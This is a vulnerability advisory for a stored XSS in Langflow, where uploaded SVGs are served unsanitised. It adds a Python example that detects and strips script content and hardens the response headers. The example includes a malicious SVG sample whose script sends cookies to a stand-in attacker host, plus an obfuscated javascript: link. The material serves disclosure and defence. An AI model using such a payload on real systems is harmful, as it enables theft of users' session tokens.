CVE-2026-5026 HIGH

CVE-2026-5026: Langflow - Stored XSS via Malicious SVG Upload

Vendor Langflow-Ai
Product langflow
Weakness CWE-79 · XSS
Published March 27, 2026
Last update March 27, 2026

CVSS base score

7.0/10
Attack vector Network
Attack complexity Low
Attack requirements None
Privileges required Low
User interaction Passive
Confidentiality High
Integrity Low
Availability None

CVSS vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N

What the vulnerability does

01 Description

The '/api/v1/files/images/{flow_id}/{file_name}' endpoint returns uploaded SVG files with the 'image/svg+xml' content type and without sanitizing their content. Because SVG is an XML document that may carry script elements, event-handler attributes and javascript: links, an authenticated user who can upload files (PR:L in the vector) can store an SVG whose script runs in Langflow's origin whenever another user opens the file (UI:P). The result is stored cross-site scripting: the script can read the authentication tokens stored in cookies, including the JWT access and refresh tokens, and can call the API as the victim. Fixes for this bug class either strip active content from SVGs before serving them or serve them so the browser never executes them (a download-only Content-Disposition or a non-renderable content type, plus a sandboxing Content-Security-Policy on the response).
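The following is an added illustration, not Langflow's code or its patch. It models the serving path the description talks about with plain functions that return a header dict and a body: a `vulnerable_response` that hands back the stored bytes as 'image/svg+xml', a `find_active_content` check that lists the script-bearing constructs in an SVG, and a `hardened_response` that strips them and adds a sandboxing CSP as a second layer. The function names, header dicts and the two sample SVGs are assumptions constructed for this example.

```python
"""Added illustration (not Langflow's code): why an SVG served verbatim as
image/svg+xml is stored XSS, and two defences on the serving path.  The
functions below stand in for the advisory's
/api/v1/files/images/{flow_id}/{file_name} route; names and header dicts
are assumptions made for this example."""
import mimetypes
import re
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"
# Keep the usual prefixes when re-serialising so the sanitised file still renders.
ET.register_namespace("", SVG_NS)
ET.register_namespace("xlink", XLINK_NS)

# Elements that execute script or embed arbitrary HTML inside an SVG document.
ACTIVE_ELEMENTS = {"script", "foreignobject"}
_SCRIPT_URL = re.compile(r"^(?:javascript|vbscript):", re.IGNORECASE)


def _is_script_url(value: str) -> bool:
    # Browsers drop ASCII control characters and spaces before matching the scheme,
    # so "java\nscript:" must be treated like "javascript:".
    return bool(_SCRIPT_URL.match(re.sub(r"[\x00-\x20]", "", value)))


def _local(name: str) -> str:
    """'{namespace}tag' -> 'tag', lower-cased."""
    return name.rsplit("}", 1)[-1].lower()


def find_active_content(svg: bytes) -> list:
    """List the script-bearing constructs in an SVG document (empty list = clean).

    NOTE: xml.etree is not hardened against hostile XML (entity expansion);
    on a real upload path parse with defusedxml or cap the size first."""
    findings = []
    for el in ET.fromstring(svg).iter():
        if _local(el.tag) in ACTIVE_ELEMENTS:
            findings.append("element:" + _local(el.tag))
        for name, value in el.attrib.items():
            attr = _local(name)
            if attr.startswith("on"):                        # onload=, onclick=, ...
                findings.append("attr:" + attr)
            elif attr == "href" and _is_script_url(value):   # href= / xlink:href=
                findings.append("href:" + value)
    return findings


def sanitize_svg(svg: bytes) -> bytes:
    """Remove script elements, on* handlers and javascript: hrefs; keep the drawing."""
    root = ET.fromstring(svg)
    parents = {child: parent for parent in root.iter() for child in parent}
    for el in list(root.iter()):
        if _local(el.tag) in ACTIVE_ELEMENTS and el in parents:
            parents[el].remove(el)
            continue
        for name in list(el.attrib):
            attr = _local(name)
            if attr.startswith("on") or (attr == "href" and _is_script_url(el.attrib[name])):
                del el.attrib[name]
    return ET.tostring(root, encoding="utf-8")


def vulnerable_response(file_name: str, data: bytes):
    """The behaviour the advisory describes: stored bytes, SVG MIME type, no checks."""
    return {"Content-Type": "image/svg+xml"}, data


def hardened_response(file_name: str, data: bytes):
    """Sanitise on the way out and sandbox the document as a second layer."""
    headers = {"X-Content-Type-Options": "nosniff"}
    if file_name.lower().endswith(".svg"):
        data = sanitize_svg(data)
        headers["Content-Type"] = "image/svg+xml"
        # Script never runs for an SVG loaded via <img>; the XSS needs the file opened
        # as a document (direct navigation, <iframe>, <object>).  A sandboxed CSP on
        # the response stops script there even if the sanitiser misses a construct.
        headers["Content-Security-Policy"] = "sandbox; script-src 'none'"
    else:
        headers["Content-Type"] = mimetypes.guess_type(file_name)[0] or "application/octet-stream"
    return headers, data


# Constructed samples: the kind of upload the advisory is about, and a clean one.
MALICIOUS_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <script>fetch('https://attacker.invalid/?c=' + encodeURIComponent(document.cookie))</script>
  <rect width="10" height="10" onload="alert(document.domain)"/>
  <a xlink:href="java&#10;script:alert(1)"><text y="8">x</text></a>
</svg>"""
BENIGN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10"><circle cx="5" cy="5" r="4"/></svg>'

if __name__ == "__main__":
    print("vulnerable:", find_active_content(vulnerable_response("logo.svg", MALICIOUS_SVG)[1]))
    headers, body = hardened_response("logo.svg", MALICIOUS_SVG)
    print("hardened:", find_active_content(body), headers)
    print(body.decode())
```

Running the file shows three findings for the stored payload on the vulnerable path and none after `hardened_response`, with the rect and text still present. The sanitiser is deliberately an allow-nothing-active filter rather than a full allow-list; a production path would also restrict the element and attribute vocabulary, and the CSP header is there precisely because sanitiser bypasses are a recurring theme with SVG.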

Key dates

02 Disclosure timeline

March 27, 2026 CVE published
March 27, 2026 Record updated